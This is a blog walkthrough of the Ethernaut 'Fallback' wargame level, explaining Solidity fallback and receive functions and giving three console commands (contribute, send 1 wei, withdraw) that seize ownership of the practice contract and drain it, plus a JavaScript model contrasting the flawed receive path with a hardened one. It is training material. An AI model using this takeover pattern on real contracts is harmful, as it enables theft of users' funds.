Ethernaut — Web3/Solidity based wargame — Level 1 with solution

LastFerbbs
Aug 10, 2022

Hello, today we are going to talk about Ethernaut:
https://ethernaut.openzeppelin.com/

The Ethernaut is a Web3/Solidity based wargame inspired on overthewire.org, played in the Ethereum Virtual Machine. Each level is a smart contract that needs to be ‘hacked’. The game is 100% open source and all levels are contributions made by other players.

The first level is called Fallback.

What does fallback mean in Solidity?

The fallback function is executed on a call to the contract if none of the other functions match the given function signature, or if no data was supplied at all and there is no receive Ether function. The fallback function always receives data, but in order to also receive Ether it must be marked payable — this is how the Solidity docs describe it.

To learn more about fallback and its different types check this (my article about fallback that will be written soon)

Above is the contract code that is prepared for us to “hack”.

Target:
- claiming ownership of the contract
- reducing its balance to 0

Tips from level authors:
- What are fallbacks methods, when to use them
- Ways to send ether to a contract
- Ether decimals

Now I will provide the solution to this problem. My tip for you is to at least try to solve it by yourself first.

There are 2 possible solutions, but only 1 is practical:
a) Sending 1000 eth in 1 mln txs (because you can send only less than 0.001 ether with 1 contribute function call). Rinkeby produces 1 block every 15 seconds, which means it would take more than 173 days to accomplish this, and you would need more than 1000 Rinkeby eth :)
(1 mln txs * 15 s block time) / (86400 seconds in a day) ~= 173 days

b) There are 2 functions in this contract that let us change the owner:
- contribute() — the if statement inside it won’t let us change the owner, but we can send some ether (less than 0.001) and “contribute” to this contract, which means binding our address to the ether we have sent by using the mapping named contributions.
- receive() — the fallback function that lets the contract receive ether the same way that a normal wallet address can receive it. This function checks whether we are on the contributions list (by checking if our address maps to a value above 0), so we can send 1 wei using contribute(), then send 1 wei to the contract as a normal transfer (contract.send(1)), and after that we are finally the owner.

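Withdrawing the ether is now trivial, so I won’t describe it.

The console commands to finish the exercise are:

await contract.contribute({'value': 1})  // become a contributor with 1 wei
await contract.send(1)                   // plain transfer, handled by receive()
await contract.withdraw()                // callable now that we are the owner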
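
The three console commands above, replayed against a small in-memory model of the logic this post describes, next to a variant whose receive path never touches ownership. This is an added example, not the level's Solidity source; the class and function names, the address strings and the deployer's 1000 ether starting contribution (taken from option a) are assumptions of the model.

```javascript
// Simplified model of the behaviour described in the post (not the real contract).
// Amounts are in wei as BigInt; addresses are plain constructed strings.
const ETHER = 10n ** 18n;

class FallbackModel {
  constructor(deployer, hardened = false) {
    this.owner = deployer;
    this.hardened = hardened;
    this.balance = 0n;
    this.contributions = new Map([[deployer, 1000n * ETHER]]); // assumed start value
  }
  contributionOf(addr) { return this.contributions.get(addr) ?? 0n; }

  // contribute(): accepts less than 0.001 ether per call; the owner changes
  // only when the caller's total exceeds the current owner's total.
  contribute(sender, value) {
    if (value >= ETHER / 1000n) throw new Error("value must be < 0.001 ether");
    this.balance += value;
    this.contributions.set(sender, this.contributionOf(sender) + value);
    if (this.contributionOf(sender) > this.contributionOf(this.owner)) this.owner = sender;
  }

  // receive(): plain ether transfer; only checks for a past contribution.
  receive(sender, value) {
    if (this.contributionOf(sender) <= 0n) throw new Error("not a contributor");
    this.balance += value;
    if (!this.hardened) this.owner = sender; // weak guard: 1 wei buys ownership
  }

  withdraw(sender) {
    if (sender !== this.owner) throw new Error("caller is not the owner");
    const paid = this.balance;
    this.balance = 0n;
    return paid;
  }
}

// Replays contribute(1 wei) -> send(1 wei) -> withdraw() as "player".
function replay(hardened) {
  const c = new FallbackModel("deployer", hardened);
  c.contribute("player", 1n);
  c.receive("player", 1n);
  let drained = 0n;
  try { drained = c.withdraw("player"); } catch (e) { /* player is not the owner */ }
  return { owner: c.owner, balance: c.balance, drained };
}
```

With the ownership assignment removed from the receive path, the same sequence leaves the deployer as owner and the funds in place; the only remaining route to ownership is the contribution comparison from option a.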

That’s all for today, thanks for your attention. If you think I can improve something in my texts or explain topics further, leave a comment.
